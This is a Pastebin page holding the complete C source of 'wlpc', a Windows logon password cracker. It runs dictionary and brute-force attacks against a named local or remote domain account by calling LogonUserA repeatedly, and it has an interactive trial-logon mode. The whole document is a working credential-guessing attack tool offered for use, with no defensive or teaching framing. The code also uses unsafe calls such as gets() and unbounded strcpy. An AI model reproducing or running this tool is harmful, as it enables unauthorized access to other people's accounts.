Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <Windows.h>
- #include <conio.h>
- #include <cstdio>
- #include <cstdlib>
- #include <cctype>
- void die(const char* format, ...) {
- va_list v;
- va_start(v, format);
- vfprintf(stderr, format, v);
- exit(1);
- }
- int logon(const char* user, const char* pass, const char* domain, bool showmsg) {
- DWORD ret = 1;
- HANDLE tok;
- char* msg;
- if (!LogonUserA(user,domain,pass,LOGON32_LOGON_NETWORK,LOGON32_PROVIDER_DEFAULT,&tok)) {
- ret = 0;
- if (showmsg) {
- ret = GetLastError();
- FormatMessageA(
- FORMAT_MESSAGE_ALLOCATE_BUFFER |
- FORMAT_MESSAGE_FROM_SYSTEM |
- FORMAT_MESSAGE_IGNORE_INSERTS,
- NULL,
- ret,
- NULL,
- (char*)&msg,
- 0, NULL
- );
- puts(msg);
- LocalFree(msg);
- }
- } else { if (showmsg) puts("Success!"); }
- CloseHandle(tok);
- return ret;
- }
- void prompt() {
- char *domain, *user, *pass, *input;
- domain = (char*)malloc(256);
- user = (char*)malloc(256);
- pass = (char*)malloc(256);
- input = (char*)malloc(256);
- domain[0] = '.';
- domain[1] = 0;
- for (;;) {
- fputs("-", stdout);
- gets(input);
- switch (input[0]) {
- case '?':
- puts(
- "Interactive mode commands:\n"
- "d DOMAIN Set domain (Use \".\" for local machine)\n"
- "u USER Set username\n"
- "p PASS Set password\n"
- "x Attempt logon\n"
- "q Quit\n"
- );
- break;
- case 'd': strcpy(domain, input + 2); break;
- case 'u': strcpy(user, input + 2); break;
- case 'p': strcpy(pass, input + 2); break;
- case 'x': logon(user, pass, domain, true); break;
- case 'q': free(domain); free(user); free(pass); free(input); return;
- default: puts("Unknown command\n");
- }
- }
- }
- struct pass_type {
- bool lcase;
- bool ucase;
- bool digit;
- bool punct;
- bool space;
- };
- void brute(const char* user, struct pass_type * ptype, const char* domain) {
- char i;
- int j = 0, k;
- char * chrs, * pass;
- bool carry;
- chrs = (char*)malloc(100);
- pass = (char*)malloc(256);
- if (ptype->lcase) for (i = 'a'; i <= 'z'; i++, j++) chrs[j] = i;
- if (ptype->digit) for (i = '0'; i <= '9'; i++, j++) chrs[j] = i;
- if (ptype->space) chrs[j++] = ' ';
- if (ptype->ucase) for (i = 'A'; i <= 'Z'; i++, j++) chrs[j] = i;
- if (ptype->punct) for (i = 0x21; i < 0x7f; i++) if (ispunct(i)) chrs[j++] = i;
- for (k = 0; chrs[k]; k++); k--;
- chrs[j] = 0;
- pass[0] = chrs[0];
- pass[1] = 0;
- puts("Press Enter anytime to stop. . .");
- Sleep(1000);
- for (puts(pass); !logon(user, pass, domain, false); puts(pass)) {
- if (_kbhit()) if (_getch() == '\r') {
- free(chrs);
- free(pass);
- puts("\nStopped.");
- return;
- }
- i = 0;
- do {
- if (pass[i] == chrs[k]) {
- carry = true;
- pass[i] = chrs[0];
- } else {
- carry = false;
- pass[i] = *(strchr(chrs, pass[i]) + 1);
- break;
- }
- } while (pass[++i]);
- if (carry) {
- j = strlen(pass);
- pass[j] = chrs[0];
- pass[++j] = 0;
- }
- }
- puts("\nSuccess!");
- return;
- }
- int main(int argc, char ** argv) {
- if (argc == 1)
- die(
- "wlpc - by Jakash3\n"
- "Windows Logon Password Cracker\n"
- "Usage: %s [username [-w wordfile | -b [-l -u -d -p -s]] [-d domain]] | -i \n\n"
- "-w wordfile Dictionary attack. Using file containing line by line passwords\n"
- "-b Bruteforce attack using one or more of the following switches:\n"
- " -l Include lowercase alphabetical characters.\n"
- " -u Include uppercase alphabetical characters.\n"
- " -n Include digit characters\n"
- " -p Include punctuation characters\n"
- " -s Include space\n"
- "username Name of user account to try logging in as\n"
- "-d domain Optional. Remote Domain or server holding the user account\n"
- "-i Interactive mode\n", argv[0]
- );
- if (argc == 2 && !strcmp(argv[1], "-i")) { prompt(); return 0; }
- FILE* f;
- char *pass, *domain = ".", *wfile;
- bool bf = false;
- struct pass_type p;
- memset(&p, 0, sizeof(struct pass_type));
- int i;
- for (i = 1; i < argc; i++) {
- if (!strcmp(argv[i], "-d")) domain = argv[++i];
- else if (!strcmp(argv[i], "-i")) { prompt(); return 0; }
- else if (!strcmp(argv[i], "-w")) wfile = argv[++i];
- else if (!strcmp(argv[i], "-b")) bf = true;
- else if (!strcmp(argv[i], "-l")) p.lcase = true;
- else if (!strcmp(argv[i], "-u")) p.ucase = true;
- else if (!strcmp(argv[i], "-n")) p.digit = true;
- else if (!strcmp(argv[i], "-p")) p.punct = true;
- else if (!strcmp(argv[i], "-s")) p.space = true;
- }
- if (bf) { brute(argv[1], &p, domain); return 0; }
- pass = (char*)malloc(256);
- if (!(f = fopen(wfile, "r"))) die("Failed to open %s\n", wfile);
- pass = (char*)malloc(256);
- puts("Press Enter anytime to stop. . .");
- Sleep(1000);
- while (!feof(f)) {
- if (_kbhit())
- if (_getch() == '\r') {
- fclose(f);
- free(pass);
- puts("\nStopped.");
- return 0;
- }
- if (!fgets(pass, 256, f)) break;
- *strpbrk(pass, "\r\n") = 0;
- puts(pass);
- if (logon(argv[1], pass, domain, false)) {
- puts("\nSuccess!");
- fclose(f);
- free(pass);
- return 0;
- }
- }
- puts("\nEnd of file!");
- fclose(f);
- free(pass);
- return 0;
- }
Add Comment
Please, Sign In to add comment